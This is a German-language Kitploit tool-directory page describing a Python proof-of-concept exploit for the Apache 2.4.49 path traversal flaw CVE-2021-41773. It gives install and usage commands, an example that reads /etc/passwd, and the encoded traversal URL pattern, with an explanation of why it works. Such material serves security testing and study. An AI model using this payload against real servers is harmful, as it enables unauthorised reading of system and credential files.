Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2021-41773 — Python-Exploit für CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal-Sicherheitslücke | Kitploit
Tools/GitHubGitHub/blu3ming/poc-cve-2021-41773
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubblu3ming/poc-cve-2021-41773

PoC-CVE-2021-41773

Python-Exploit für CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal-Sicherheitslücke

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773 Apache HTTP Server Path-Traversal-Exploit

Ein Python-Exploit für CVE-2021-41773, eine Path-Traversal-Sicherheitslücke in Apache HTTP Server 2.4.49, die das Lesen beliebiger Dateien vom Server ermöglicht.

Schwachstellendetails

CVE-2021-41773 ist eine Path-Traversal-Sicherheitslücke in Apache HTTP Server 2.4.49, die aufgrund einer unzureichenden Validierung benutzerdefinierter Pfade auftritt. Die Schwachstelle ermöglicht es Angreifern, Dateien außerhalb des Dokumentenverzeichnisses zu lesen, indem sie URL-kodierte Path-Traversal-Sequenzen verwenden.

  • CVSS-Score: 7.5 (Hoch)
  • Betroffene Versionen: Apache HTTP Server 2.4.49
  • Vektor: Remote, ohne Authentifizierung

Installation

root@kitploit:~
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt

Verwendung

root@kitploit:~
python3 cve-2021-41773.py -t <target> -f <file_path>

Parameter

  • -t, --target: Ziel-URL (Protokoll und Port angeben, falls erforderlich)
  • -f, --file: Dateipfad, der vom Server gelesen werden soll

Beispiel

root@kitploit:~
# Read /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

Erfolgreicher Exploit

Funktionsweise

Der Exploit verwendet URL-kodierte Path-Traversal-Sequenzen (.%2e/%2e%2e/), um Apaches Pfadvalidierung zu umgehen:

  1. Die anfällige Apache-Version kann den Pfad nicht korrekt decodieren und validieren
  2. URL-kodierte Punkte (.%2e) umgehen die ersten Sicherheitsprüfungen
  3. Der Server verarbeitet das Path-Traversal nach der Decodierung, was den Dateizugriff ermöglicht

Der Schlüssel liegt in der Verwendung von urllib3.PoolManager() anstelle von requests.get(), um eine automatische URL-Normalisierung zu verhindern, die den Exploit zerstören würde.

Technische Details

root@kitploit:~
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}

Dies entspricht:

root@kitploit:~
/cgi-bin/../../../../{target_file}

Referenzen

  • CVE-2021-41773 - MITRE
  • Apache HTTP Server Sicherheitshinweis
  • NVD - CVE-2021-41773
Tool herunterladen